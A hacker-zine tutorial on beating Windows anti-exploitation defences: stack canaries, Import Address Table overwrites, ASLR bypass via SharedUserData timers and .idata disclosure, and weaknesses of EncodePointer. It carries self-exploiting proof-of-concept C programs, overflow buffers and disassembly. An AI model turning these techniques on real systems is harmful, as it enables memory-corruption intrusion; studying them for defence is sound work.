[==============================================================================]
[-------[ Beating some counter-exploitation measures on WinNT+ systems ]-------]
[==============================================================================]
_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>'<######
*#########( )####*
##########>.<##### author: Nomenumbra/[0x00SEC]
################ remember: http://www.bash.org/?753599
*############*
"T######T"
--[ 0x00 ]--------------------------------------------[ Table Of Contents ]-----
[ 0x00 ] Table Of Contents
[ 0x01 ] Intro
[ 0x02 ] IAT overwriting
[ 0x03 ] Beating ASLR trough global static values and .idata disclosure
[ 0x04 ] A look at the M$ Pointer hijacking protection api
[ 0x05 ] Greetings 'n shoutz
--[ 0x01 ]--------------------------------------------------------[ Intro ]-----
Welcome, ladies and gentlemen, to this article - aimed at laying out a few
relatively fresh (and some new) concepts and techniques for exploiting WinNT+
systems armed with counter-exploitation techniques. Sure, there are more areas
to cover concerning this topic, but those have been dealt with, over and over
again, whilst most of the stuff in this paper is either scarcely documented or
new. I hope you'll enjoy your read.
--[ 0x02 ]----------------------------------------------[ IAT overwriting ]-----
The following program is a simple demonstration of how canary values work:
------------------------------------------------------------------------[SNIP]--
int main(int argc, char *argv[])
{
unsigned char canary; // canary value
char buffer[256];
char buffer2[289];
canary = 0xAB; // assign value
memset(buffer,0x00,256); // zero out the memory
// construct evil buffer
memset(buffer2,0x90,271); // 256+12+3 (12+3 bytes is mingw compiler
// specific junk on my test box so it seemed)
memset(buffer2+271,0xAB,1); // canary
memset(buffer2+272,0x90,12); // +12 bytes to EIP
memset(buffer2+284,0xFF,4); // eip
strcpy(buffer,buffer2);
if(canary != 0xAB)
{
printf("Canary corruption!\n");
exit(0);
}
printf("You made it!\n");
return 0;
}
------------------------------------------------------------------------[/SNIP]-
This is a pretty casual overflow with strcpy(0022FE60,buffer2);
0022FE60 == start of dest buffer
0022FF6F == canary location
If we take a look at what is between the end of the buffer (0022FF60) and the
canary location (0022FF6F), we get the following dump:
0022FF60 AD AE C0 77 38 07 91 7C ®Àw8‘|
0022FF68 FF FF FF FF A8 FF 22 ÿÿÿÿ¨ÿ"
Now, 0x77C0AEAD is a memory address in msvcrt.dll and 0x7C910738 is a memory
address in ntdll.dll - but they reference nothing in particular, so my guess is
this is just mingw-specific junk, which we'll ignore. The main point is: Dealing
with static canaries is trivial, as demonstrated above. But what if we used a
randomized canary? Let's look at a slightly modified example:
------------------------------------------------------------------------[SNIP]--
int main(int argc, char *argv[])
{
unsigned char saved_canary;
unsigned char canary;
char buffer[256];
char buffer2[289];
srand(GetTickCount());
saved_canary = (unsigned char)(rand()%0xFF);
canary = saved_canary;
memset(buffer,0x00,256);
memset(buffer2,0x90,270); // 256+12+2
memset(buffer2+270,0xAB,1); // canary
memset(buffer2+271,0xAB,1); // saved_canary
memset(buffer2+272,0x90,12); // space in between
memset(buffer2+284,0xFF,4); // eip
strcpy(buffer,buffer2);
if(canary != saved_canary)
{
printf("Canary corruption!\n");
exit(0);
}
printf("You made it!\n");
return 0;
}
------------------------------------------------------------------------[/SNIP]-
As we can see, the canary value is compared to a saved_canary value, which makes
this implementation downright stupid: The saved_canary can trivially be
overwritten as well. Now what if we localize the saved_canary value somewhere
else? Like this for example?
------------------------------------------------------------------------[SNIP]--
unsigned char saved_canary;
int main(int argc, char *argv[])
{
unsigned char canary;
char buffer[256];
/* ... */
------------------------------------------------------------------------[/SNIP]-
Well, this can be solved by overwriting with a really long buffer:
buffer address = 0x0022FE60
saved_canary address = 0x00404060
diff = 0x1D4200
Hence, buffer+diff = saved_canary. Note that this only works when all memory in
between is writable. However, memory isn't always writable, and a static NULL
byte canary might be used.
In these situations, on Linux platforms, we can help ourselves with GOT
overwriting. For those unfamiliar with the attack, I'll give a short example.
Imagine the following app:
char* ptr = NULL;
char array[10];
ptr = array;
strcpy(ptr,argv[1]);
printf("test one two three...\n");
strcpy(ptr,argv[2]);
printf("%s\n",ptr);
The basic idea is that we are somehow unable to overflow EIP (either by stack
protection or otherwise) and must overwrite the ptr value with a value of our
choice. Now, if we look closely at the example we can see that the first strcpy
can overflow array. If we overflow array and modify ptr with it, we can control
the destination address of the second strcpy, yielding an arbitrary write.
The Global Offset Table (GOT) redirects position independent address
calculations to an absolute location and is located in the .got section of an
ELF executable or shared object. To quote c0ntex on this:
"It stores the final (absolute) location of a function calls symbol, used in
dynamically linked code. When a program requests to use printf() for instance,
after the rtld locates the symbol, the location is then relocated in the GOT and
allows for the executable via the Procedure Linkage Table, to directly access
the symbols location."
Printf would look something like this:
Location 1: call 0x80482b0 <printf> (PLT)
Location 2: jmp *0x8049550 (GOT)
Where location 2 is the GOT table entry.
If we manage to overwrite ptr with printf()'s GOT entry addr, we can modify the
entry and redirect execution of the following printf() to any address we want,
for example the libc function system() and then supply the name of a suid shell
as an argument.
Now, on Linux this is a pretty well-known technique, but that isn't the case for
its Windows equivalent. In fact, I haven't seen it being documented anywhere.
The PE file format equivalent of the GOT table is the IAT table. The IAT is used
as a lookup table when the application is calling a Windows API function.
Because a compiled PE DLL/EXE cannot know in advance where the other DLLs it
depends upon are located in memory, an indirect jump is required. As the dynamic
linker loads modules and joins them together, it writes jump instructions into
the IAT slots which point to the actual location of the destination function.
If we look at the disassembly of a simple application utilizing printf we
can see the following:
00401376 |. E8 45050000 CALL <JMP.&msvcrt.printf> ; \printf
Now, if we take a look at the destination of this call:
004018C0 $-FF25 04514000 JMP DWORD PTR DS:[<&msvcrt.printf>] ; msvcrt.printf
004018C6 90 NOP
004018C7 90 NOP
004018C8 00 DB 00
004018C9 00 DB 00
004018CA 00 DB 00
004018CB 00 DB 00
004018CC 00 DB 00
004018CD 00 DB 00
004018CE 00 DB 00
004018CF 00 DB 00
004018D0 $-FF25 0C514000 JMP DWORD PTR DS:[<&msvcrt.strcpy>] ; msvcrt.strcpy
As you can see, in this table we create a jump to the address located at
0x04514000. So the DWORD located at 0x04514000 is taken and that DWORD is
treated as an address to which we jump, the address of the printf function
prologue in msvcrt.dll. I will now present an example demonstrating IAT Table
hijacking.
This is a self-exploiting vulnerable app:
------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#define DIFF 28
// 0x7C81CDDA: ExitProcess kernel32.dll address
#define BUF2 "\xDA\xCD\x81\x7C"
char buffer[500];
int main(int argc, char **argv)
{
char* pointer = NULL;
char array[10];
memset(buffer,0,500);
memset(buffer,0x90,DIFF);
strcpy(buffer+DIFF,"\x04\x51\x40\x00"); // printf IAT entry
pointer = array;
strcpy(pointer, buffer); // argv[1]
printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
strcpy(pointer, BUF2);
printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
return 0;
}
------------------------------------------------------------------------[/SNIP]-
As you can see, we overflow array by filling it with NOP bytes and overwriting
char* pointer with the address of the printf IAT entry (0x04514000). Once it's
overwritten, the second strcpy operation will copy the address of the
ExitProcess function located in kernel32.dll to the IAT slot of printf,
redirecting the next printf() call to ExitProcess. This technique is pretty
powerful, since it allows us to beat both non-executable stacks and canary
protection. Let me demonstrate this:
------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
// still 28, remember the mingw-specific compiler junk?
#define DIFF 28
#define BUF2 "\xDA\xCD\x81\x7C"
//0x7c81cdda exitprocess kernel32.dll address
unsigned char saved_canary;
char buffer[500];
void SomePrivilegedFunction() { }
int main(int argc, char **argv)
{
char* pointer = NULL; // array + 28
unsigned char canary; // array + 27
char array[10];
saved_canary = (unsigned char)(rand()%0xFF);
canary = saved_canary;
memset(buffer,0,500);
memset(buffer,0x90,DIFF);
strcpy(buffer+DIFF,"\xF8\x50\x40\x00"); // exit() IAT entry
pointer = array;
strcpy(pointer, buffer); // argv[1]
printf("[%s]\n",pointer);
strcpy(pointer, BUF2);
if(canary != saved_canary)
{
exit(0);
}
else
printf("[%s]\n",pointer);
return 0;
}
------------------------------------------------------------------------[/SNIP]-
This app, a modification of the previously shown app, is self-exploiting, too.
Only this time, there is a canary value introduced and we will exit() if it
doesn't match. The solution is obvious, we overwrite exit()'s IAT entry. But
since we don't control the arguments, what good can come from overwriting it
like this? Let us see:
00401387 |. 3A05 60404000 CMP AL,BYTE PTR DS:[404060] ; |
0040138D |. 74 0C JE SHORT iathijac.0040139B ; |
0040138F |. C70424 0000000>MOV DWORD PTR SS:[ESP],0 ; |
00401396 |. E8 55050000 CALL <JMP.&msvcrt.exit> ; \exit
0040139B |> 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] ; |
As we can see, the comparison located at 0x00401387 is followed by a conditional
jump to either the function exit or continuation of code execution flow at
0x0040139B.
So if we overwrite exit()'s IAT entry with, for example, the address of
SomePrivilegedFunction, we still fully control code execution flow. Hell, we can
supply the address of our buffer as well, potentially making it execute
shellcode (that is, on systems with an executable stack, else we'll have to
resort to pure api call replacement or code flow redirection). Also note that
this technique might be of use in combination with other attacks.
For example, when we cannot redirect code flow or supply a usefull API for
overwriting, we can still manipulate the program into unauthorized behavior in
another way, for example by overwriting the IAT entry of the exit() call, when
we know that this call is called after supplying a wrong password. We can then
overwrite the entry with the address of the code branch which is normally called
upon a successfull password check, elevating our privileges. Note that these
write-anything-anywhere situations might seem rare, but are far more common in
format-string exploits.
--[ 0x03 ]--------------------------[ Beating ASLR through global ]-----
[ static values and .idata disclosure ]
A recurring issue when it comes to reliable exploitation is that of finding a
decent return address. Usually we use an opcode configuration located in a
loaded module or (in some rare cases) located in the mapped executable memory
itself. However, when ASLR is involved, things tend to get a bit tricky, and if
we don't want to rely on prediction or bruteforce, we'll have to find another
way to locate a decent return address. Now, on linux systems, there is the old
linux-gate.so.1 technique. To quote izik's paper:
"'Linux-gate.so.1' is a dynamically shared object (DSO). It's life purpose is to
speed up and support system calls and signal/sigreturn for the kernel within the
user application. In particular it helps out handling a situation where a system
call accepts six parameters. This is when the EBP register has to be overwritten
and serve as the 6th parameter to the system call. Notice that this ties the
usage and need of linux-gate.so.1 to only linux kernels that are running under
ia32 and ia32-64 architectures."
Due to its nature, linux-gate.so.1 is always located at address 0xffffe000, so
we can search from 0xffffe000 to 0xffffeFFF for the desired opcode bytes to get
reliable return addresses.
On Windows however, there is no such thing as linux-gate.so.1 so we must look
for other statically located memory areas. Now let us consider timers and
counters, if we manage to find a timer or counter variable in memory, given its
range is big enough, we know that at a given time this counter/timer will
contain our opcode configuration (say we're looking for a jmp esp, which is
0xFFE4). Now, for using this technique in a reliable exploit we must know:
0) The interval of the timer/counter
1) The starting value of the timer/counter
2) The range of the timer/counter
3) The (static) address of the timer/counter
So say we have a given timer counting from a given date - January the 1st, 1970,
say. This timer has an interval of 1 second and a size of 4 bytes. Determening
the interval can be done in a number of ways, unless one already has knowledge
of the usage of said timer. One such method might be Skape's Telescope program
discussed in his "Temporal Return Addresses" article for uninformed. Now, if we
are on the same machine, exploiting a local vulnerability, determining local
time is trivial, but what to do when we are attacking a remote machine?
There are several techniques we can use to determine remote system time.
0) Using NetRemoteTOD in combination with NULL sessions.
It is possible to use a standard windows API for determining the remote time.
Doing so requires establishing a NULL session first. For those unfamiliar
with the concept: http://rusecure.rutgers.edu/add_sec_meas/nullssn.php
A small C example of code establishing a connection:
NETRESOURCE nr;
nr.lpRemoteName = "\\\\server\\resource";
nr.dwType = RESOURCETYPE_DISK;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
WNetAddConnection2(&nr,(LPSTR) szPassWord,(LPSTR) szUserName,0);
Now fetching the remote time goes as follows:
WCHAR wszNetbios[200];
TIME_OF_DAY_INFO *tinfo=NULL;
// convert string
mbstowcs(wszNetbios, szServer, 200);
// return server time of day
NetRemoteTOD(wszNetbios,(LPBYTE *)&tinfo);
As you can see, the TIME_OF_DAY_INFO structure provides plenty of information
for us to deal with: http://msdn2.microsoft.com/en-us/library/aa370959.aspx
1) ICMP TIMESTAMP
We can use the ICMP TIMESTAMP request to obtain the number of milliseconds
since midnight UT. If we can obtain the timezone we can obtain the exact
remote time. Obtaining the timezone can be done by performing an IP WHOIS
lookup for example.
2) HTTP Server Date Header
If a HTTPd is running on the target machine, we can potentially fetch the
remote date from the HTTP header.
3) IP Timestamps Option
Just like the ICMP TIMESTAMP request, IP also has a timestamp option that
measures the number of milliseconds since midnight UT.
Now let us look at a special memory region found in all processes on Windows
NT+. This memory region, known as NTSharedUserData is always located at the same
static address, namely 0x7ffe0000. The structure looks like this on WinXP SP2:
+0x000 TickCountLow : Uint4B
+0x004 TickCountMultiplier : Uint4B
+0x008 InterruptTime : _KSYSTEM_TIME
+0x014 SystemTime : _KSYSTEM_TIME
+0x020 TimeZoneBias : _KSYSTEM_TIME
+0x02c ImageNumberLow : Uint2B
+0x02e ImageNumberHigh : Uint2B
+0x030 NtSystemRoot : [260] Uint2B
+0x238 MaxStackTraceDepth : Uint4B
+0x23c CryptoExponent : Uint4B
+0x240 TimeZoneId : Uint4B
+0x244 Reserved2 : [8] Uint4B
+0x264 NtProductType : _NT_PRODUCT_TYPE
+0x268 ProductTypeIsValid : UChar
+0x26c NtMajorVersion : Uint4B
+0x270 NtMinorVersion : Uint4B
+0x274 ProcessorFeatures : [64] UChar
+0x2b4 Reserved1 : Uint4B
+0x2b8 Reserved3 : Uint4B
+0x2bc TimeSlip : Uint4B
+0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
+0x2c8 SystemExpirationDate : _LARGE_INTEGER
+0x2d0 SuiteMask : Uint4B
+0x2d4 KdDebuggerEnabled : UChar
+0x2d5 NXSupportPolicy : UChar
+0x2d8 ActiveConsoleId : Uint4B
+0x2dc DismountCount : Uint4B
+0x2e0 ComPlusPackage : Uint4B
+0x2e4 LastSystemRITEventTickCount : Uint4B
+0x2e8 NumberOfPhysicalPages : Uint4B
+0x2ec SafeBootMode : UChar
+0x2f0 TraceLogging : Uint4B
+0x2f8 TestRetInstruction : Uint8B
+0x300 SystemCall : Uint4B
+0x304 SystemCallReturn : Uint4B
+0x308 SystemCallPad : [3] Uint8B
+0x320 TickCount : _KSYSTEM_TIME
+0x320 TickCountQuad : Uint8B
+0x330 Cookie : Uint4B
One of the purposes of SharedUserData is to provide processes with a global and
consistent method of obtaining certain information that may be requested
frequently. The reason why it's located at a static address is a design issue.
Prior to Windows XP, system calls were dispatched through the soft-interrupt
0x2E. From XP SP0 on however, they designed a way to support processor-specific
instructions for system calls, such as sysenter or syscall. To support this,
Microsoft added fields to the NtSharedUserData structure, namely the SystemCall
related fields. If we take a look at the disassembly of the data located at
NtSharedUserData.SystemCall on XP SP0 systems:
7ffe0300 8bd4 mov edx,esp
7ffe0302 0f34 sysenter
7ffe0304 c3 ret
Those familiar with windows system calls will immediately recognize this as the
m$ way of calling NT syscalls. Hence why all syscalls preformed by Windows APIs
reference NtSharedUserData.SystemCall:
mov edx,0x7ffe0300
call edx
Due to the fact that SharedUserData contained executable instructions, it was
thus necessary that the SharedUserData mapping had to be marked as executable.
However, starting from XP SP2 and 2003 SP1 they realized that this might pose a
security risk (O RLY?) So instead of positioning executable instructions there,
they replaced them with pointers, as seen on XP SP2 systems:
+0x300 SystemCall : 0x7c90eb8b
+0x304 SystemCallReturn : 0x7c90eb94
So all syscall stubs were changed like this:
mov edx,0x7ffe0300
call dword ptr [edx]
The address referenced by the NtSharedUserData.Syscall is the address of
ntdll.KiFastSystemCall, which is the same code stub previously located at
NtSharedUserData.Syscall. Now all WinNT+ systems up to XP SP2 and win2k3 SP1
have an executable SharedUserData, which makes it perfectly suited as a static
return address location. As we discussed earlier, we can use timer variables as
a return address location, and SharedUserData has three of them, namely:
+0x000 TickCountLow : Uint4B
+0x008 InterruptTime : _KSYSTEM_TIME
+0x014 SystemTime : _KSYSTEM_TIME
Now, let us look at them with our prerequisites for a good temporal return
address in mind. Let us first look at TickCountLow. TickCountLow is used, in
combination with TickCountMultiplier to calculate the number of milliseconds
since boot like this:
MilliSeconds = TickCountLow * TickCountMultiplier >> 24
Because the initial value is unknown to us, and the update interval may vary
among different hardware architectures, this value is quite unreliable. We can
however, use the TCP timestamping technique to determine the current value and
interval.
The InterruptTime value stores a 100 nanosecond counter couting the amount of
time spent processing system interrupts. Due to its unpredictable nature, both
regarding interval and initial value, this variable is virtually unusable.
The SystemTime value is a 100 nanosecond counter measured from Jan. 1, 1601.
This time is relative to the timezone the target machine is using. So if we
obtain that information, we can use the SystemTime value as a very usefull
temporal return address.
Now, the last step is to calculate the exact point of time when the target
variable will contain a valuable opcode. Let us consider a 32 bit double word
initialized with 0x00000000 at a given time, being continually incremented by Z
at an interval of X. Now, there are plenty of useful opcodes, including jmp/call
esp, pop/pop/ret for SEH overwrites, and so forth. Let's consider a trivial jmp
esp, which is 0xFFE4. Also let our target variable be located at address Y,
giving us 5 opcode occurrences during a full loop:
1) 0xFFE4<UUUU>
2) 0x<U>FFE4<UUU>
3) 0x<UU>FFE4<UU>
4) 0x<UUU>FFE4<U>
5) 0x<UUUU>FFE4
where U is any byte. The first time, 0xFFE4<UUUU> is reached after a time of
((0xFFE40000 * X)/Z) and lasts for
(((0xFFE50000-0xFFE40000-1)*X)/Z) = ((0xFFFF * X)/Z).
Given this technique, we can calculate the exact time and time window of valid
opcode occurrences.
Another interesting trick becomes applicable when exploiting a format string bug
yielding a read-anything from anywhere situation. Since .idata includes the
import directory as well as the import address name table and is statically
located, we can deduce the address of any given function. For every imported
module there is a special structure in the .idata section (as worked out by
Caolan McNamara):
typedef struct tagImportDirectory
{
DWORD dwRVAFunctionNameList;
DWORD dwUseless1;
DWORD dwUseless2;
DWORD dwRVAModuleName;
DWORD dwRVAFunctionAddressList;
}IMAGE_IMPORT_MODULE_DIRECTORY,
* PIMAGE_IMPORT_MODULE_DIRECTORY;
Each one of these entries points to information for the given imported module.
dwRVAFunctionNameList is a relative virtual address that points to a list of
RVAs, each pointing to the null-terminated string of an imported function name.
The dwUseless DWORDS are simply padding area. dwRVAModuleName is a relative
virtual address that points to the module name.
dwRVAFunctionAddressList is a RVA pointing to a list of RVAs that will be loaded
upon PE loading time. This list contains the addresses of the loaded functions.
Now, by using a read-anything-from-anywhere situation, we can read from this
statically located dwRVAFunctionAddressList to deduce the address of an imported
function. If we then substract the correct offset, which isn't randomized, we
can obtain the base address for the given randomized module and beat ASLR in
this fashion.
--[ 0x04 ]------------[ A look at the M$ Pointer hijacking protection API ]-----
Somewhere in 2006, Michael Howard blogged about Microsoft's EncodePointer /
EncodeSystemPointer APIs which where designed to make pointer hijacking more
difficult. Now, for those who don't know what pointer hijacking is, it's
actually pretty simple, given a vulnerable function:
------------------------------------------------------------------------[SNIP]--
int VulnFunc(char *szString) {
DWORD fp;
char buf[32];
strcpy(buf,szString);
fp = (DWORD)&SomeFunc;
#ifdef DEBUG
printf("[*] fp == 0x%04x\n",fp);
#endif
strcpy(buf,szString);
#ifdef DEBUG
printf("[*] fp == 0x%04x\n",fp);
#endif
if (fp)
(*(void (*)(void)) fp)();
return 0;
}
------------------------------------------------------------------------[/SNIP]-
Now, this simple stack overflow would usually be exploited by casually
overwriting EIP. But what if, for some reason, we can't supply a big enough
string (szString is too small for example)? Well, in that case we could
overwrite the fp pointer and gain control of code execution flow that way, upon
execution of (*(void (*)(void)) fp)(). Example:
When running the function using szString = "test" we get the following output:
[*] fp == 0x401290
[*] fp == 0x401290
When supplying a buffer of "\x90"x44,"\x41"x4 we get the following output:
[*] fp == 0x401290
[*] fp == 0x41414141
Now, starting from Windows XP SP2 and Windows Server 2003 SP1, M$ supplies us
with the EncodePointer / DecodePointer and EncodeSystemPointer APIs. These
functions encode the pointer and decode it before usage, adding a layer of
security when using long-lived pointers. A small example:
------------------------------------------------------------------------[SNIP]--
int Functionlol(char *szString) {
DWORD fp;
DWORD fp2;
char buf[32];
fp = (DWORD)&SomeFunc;
fp2 = 0xCAFEBABE;
#ifdef DEBUG
printf("[*]Before encoding of fp:\n");
printf("[*] fp == 0x%04x\n",fp);
printf("[*] fp2 == 0x%04x\n",fp2);
#endif
fp = (DWORD)(*(PVOID (*)(PVOID)) EncodePointer)(&SomeFunc);
#ifdef DEBUG
printf("[*]After encoding of fp and before b0f:\n");
printf("[*] fp == 0x%04x\n",fp);
printf("[*] fp2 == 0x%04x\n",fp2);
#endif
strcpy(buf,szString);
#ifdef DEBUG
printf(
"[*]After encoding of fp and after b0f, before decoding of fp to fp2:\n");
printf("[*] fp == 0x%04x\n",fp);
printf("[*] fp2 == 0x%04x\n",fp2);
#endif
fp2 = (DWORD)(*(PVOID (*)(PVOID)) DecodePointer)((void*)fp);
#ifdef DEBUG
printf("[*]After decoding of fp to fp2:\n");
printf("[*] fp == 0x%04x\n",fp);
printf("[*] fp2 == 0x%04x\n",fp2);
#endif
if (fp2)
(*(void (*)(void)) fp2)();
return 0;
}
------------------------------------------------------------------------[/SNIP]-
Note that I loaded EncodePointer and DecodePointer directly from kernel32.dll
using GetProcAddress. Let us see how this works out:
When setting szString = "test"
[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0x401290
As we can see, fp gets neatly encoded and eventually decoded to fp2.
Now, when attempting a buffer overflow attack:
[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x90909090
[*]After decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x88119145
As we can see, fp gets encoded and eventually overwritten with 0x41414141. The
problem lies in the fact that this value gets decoded to fp2, resulting in a
false address. EncodeSystemPointer / DecodeSystemPointer work in exactly the
same manner, with one major difference. EncodePointer uses a per-process
randomized value, whilst EncodeSystemPointer uses a system-wide unique value.
Interesting ... but how do these functions work exactly?
Let us first look at EncodeSystemPointer, since this function is the least
secure. EncodeSystemPointer is located at 0x7C91AFC8 in kernel32.dll on my box,
which disassembles to:
7C91AFC8 > 8BFF MOV EDI,EDI
7C91AFCA 55 PUSH EBP
7C91AFCB 8BEC MOV EBP,ESP
7C91AFCD A1 3003FE7F MOV EAX,DWORD PTR DS:[7FFE0330]
7C91AFD2 3345 08 XOR EAX,DWORD PTR SS:[EBP+8]
7C91AFD5 5D POP EBP
7C91AFD6 C2 0400 RETN 4
Obviously DecodeSystemPointer is exactly the same as EncodeSystemPointer, since
the function is basically a XOR of the pointer with a certain "magic value"
DWORD located at 0x7FFE0330. What lies there? Well, this is a certain value in
SharedUserData (_KUSER_SHARED_DATA), indeed, the SharedUserData region we
discussed in section [0x02]. As we can see, the value referred to in the
EncodeSystemPointer code is 0x7FFE0330, which is the base address of
SharedUserData + 0x330, which is the Cookie offset. This cookie is a magic value
which changes on reboot.
All processes have access to this Cookie, no matter what privileges. So local
attacks wouldn't be a problem since the exploit program would simply check the
value of *(DWORD*)(0x7ffe0330) and XOR the desired pointer overwrite address
with this cookie. Also, due to the static nature of this value during uptime,
eventually guessing it through bruteforce would be possible too.
Now let us look at EncodePointer.
EncodePointer is located at 0x7C913917 in kernel32.dll on my box:
Disassembly:
7C913917 > 8BFF MOV EDI,EDI
7C913919 55 PUSH EBP
7C91391A 8BEC MOV EBP,ESP
7C91391C 51 PUSH ECX
7C91391D 6A 00 PUSH 0
7C91391F 6A 04 PUSH 4
7C913921 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
7C913924 50 PUSH EAX
7C913925 6A 24 PUSH 24
7C913927 6A FF PUSH -1
7C913929 E8 EDA6FFFF CALL ntdll.ZwQueryInformationProcess
7C91392E 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
7C913931 3345 08 XOR EAX,DWORD PTR SS:[EBP+8]
7C913934 C9 LEAVE
7C913935 C2 0400 RETN 4
DecodePointer:
7C91393D > 8BFF MOV EDI,EDI
7C91393F 55 PUSH EBP
7C913940 8BEC MOV EBP,ESP
7C913942 5D POP EBP
7C913943 ^EB D2 JMP SHORT ntdll.RtlEncodePointer
As we can see DecodePointer is once again simply EncodePointer. Now, what
EncodePointer does is pretty simple, it makes a call like:
ntdll.ZwQueryInformationProcess(-1,24,dword ptr ss:[ebp-4],4,0)
Which is a simple query of ProcessSessionInformation (0x24) for the calling
process (0xFFFFFFFF == -1 == CurrentProcess handle). The returned value is the
ProcessSessionID of the ProcessEnvironmentBlock (PEB), as can be confirmed by
looking at the ReactOS (OpenSource WinNT compatible implementation) kernel
source for ZwQueryInformationProcess:
case ProcessSessionInformation:
/* ... */
/* Enter SEH for write to user-mode PEB */
_SEH_TRY
{
/* Write the session ID */
Process->Peb->SessionId = SessionInfo.SessionId;
}
Now this value is pretty tricky due to it's very random nature, but apperently
it's constructed in the following manner upon process creation.
o The higher portion of the system tick count
(100 nano-second tick count since Jan 01, 1601) XOR
o The lower portion the system tick count XOR
o The interrupt time (number of ticks during interrupts) XOR
o The number of system calls since system boot XOR
o The (ULONG)rdtsc CPU value XOR
o The memory manager page fault count
This result is then rotated right on encode using Cookie%(sizeof(ULONG_PTR)*8).
In pseudocode on a 32-bit CPU, encoding looks like this:
Ptrenc = (Ptrclear ^ Cookie) >>> (Cookie % 32)
The reason for the rotation is to make it harder to target partial pointer
overwrites, because target bits are in an unknown position in the encoded
pointer. Now we could simply bruteforce this value but there are ways to be more
efficient in our bruteforce. If we could determine any of the values used for
SessionID generation, bruteforcing would be a tad easier, because if with:
(w ^ x ^ y ^ z ^ a ^ b)
w and x are known (or approximated), it leaves us with less to bruteforce. Now,
we can attempt to determine these values remotely through uptime fingerprinting.
If we can determinte the target machine's uptime, we can approximate the first
two values.
Locally determining the system uptime is possible by calling the
NtQuerySystemInformation native API with the SystemTimeOfDayInformation system
information class, this will return the system boottime in 100 nanosecond
intervals, from which determining the system uptime is trivial.
Remotely determining uptime is possible through the TCP Timestamps Option
(TSopt) described in RFC 1323. This is possible because the way operating
systems manage their TCP timestamping allows a remote client to guess, if he
recognizes the operating system through OS fingerprinting, the machine's
uptime. BSD, for example, increments the timestamp value by one point each 500
milliseconds. The optional TCP field looks like this:
1 1 4 4
+--------+-------------+-----------------------+--------------------------+
| Kind=8 | size=10 | TS Value (TSval) | TS Echo Reply (TSecr) |
+--------+-------------+-----------------------+--------------------------+
We need to keep in mind the following things though:
The length of a timestamp value in a TCP packet is 4 bytes, so it will roll over
when the value crosses the limit of 2^32. Also windows does not instantly start
to increase the timestamp once the system has been booted up. nmap uses this
technique and does pretty well (for windows as well, despite the aforementioned
issue), so if you're interested in implementing this as a function in your
exploit trying to beat EncodePointer secured applications, you should take a
look at nmap's uptime guessing routines.
The rdtsc CPU value is simply a timestamp counter which represents the count of
ticks from processor reset.
So if we manage to obtain the uptime, and we can safely assume uptime and
process creationtime are close to each other, we can make an approximation of at
least 3 values remotely.
Now these techniques are not very accurate, but might help you exploit
applications employing pointer encoding.
--[ 0x05 ]------------------------------------------[ Greetings 'n shoutz ]-----
Greets and shouts go to Nullsec, the whole .aware/xzziroz community, The
HackThisSite collective, RRLF, 29A, The entire SmashTheStack crew, PullThePlug ,
BinaryShadow Organization, #dutch crew, Vx.netlux folks/Undernet VX crew,
blacksecurity and all "true" hackers out there.
|